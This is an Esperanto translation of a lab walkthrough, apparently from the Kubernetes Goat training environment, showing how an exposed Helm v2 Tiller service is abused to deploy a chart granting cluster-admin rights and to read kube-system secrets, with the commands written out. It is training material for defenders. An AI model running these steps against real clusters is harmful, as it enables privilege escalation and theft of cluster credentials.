Helm estas pakaĵmanaĝero por Kubernetes, io kiel apt-get
por Ubuntu. En ĉi tiu noto ni vidos la antaŭan version de helm (v2) kun la tiller-servo instalita defaŭlte, per kiu ni aliros la areton.
Ni preparu la areton; por fari tion, rulu la komandon:
kubectl run --rm --restart=Never -it --image=madhuakula/k8s-goat-helm-tiller -- bash
Manifestacio
- Se vi ne agordas ion plian, helm v2 lanĉas la tillerservon, kiu havas RBAC kun plenaj administraj rajtoj.
- Post instalado en nomspaco
kube-system
aperastiller-deploy
, kaj ankaŭ malfermas havenon 44134, ligitan al 0.0.0.0. Ĉi tio povas esti kontrolita per telnet.
$ telnet tiller-deploy.kube-system 44134
- Nun vi povas konektiĝi al la tila servo. Ni uzos la binaron de stirilo por fari operaciojn kiam ni komunikas kun la tila servo:
$ helm --host tiller-deploy.kube-system:44134 version
- Ni provu akiri la Kubernetes-grupo-sekretojn el nomspaco
kube-system
:
$ kubectl get secrets -n kube-system
- Nun ni povas krei nian propran diagramon, en kiu ni kreos rolon kun administranto-rajtoj kaj asignos ĉi tiun rolon al la defaŭlta servokonto. Uzante la ĵetonon de ĉi tiu servokonto, ni ricevis plenan aliron al nia areto.
$ helm --host tiller-deploy.kube-system:44134 install /pwnchart
- Nun kiam
pwnchart
deplojita, la defaŭlta serva konto havas plenan administran aliron. Ni kontrolu denove kiel akiri sekretojn dekube-system
kubectl get secrets -n kube-system
Sukcesa plenumo de ĉi tiu skripto dependas de kiel tiller estis deplojita; foje administrantoj deplojas ĝin en aparta nomspaco kun malsamaj privilegioj. Helm 3 ne estas sentema al tiaj vundeblecoj ĉar... ne estas en ĝi.
Noto de la tradukinto: Uzi retajn politikojn por filtri trafikon en areto helpas protekti kontraŭ ĉi tiu tipo de vundeblecoj.
fonto: www.habr.com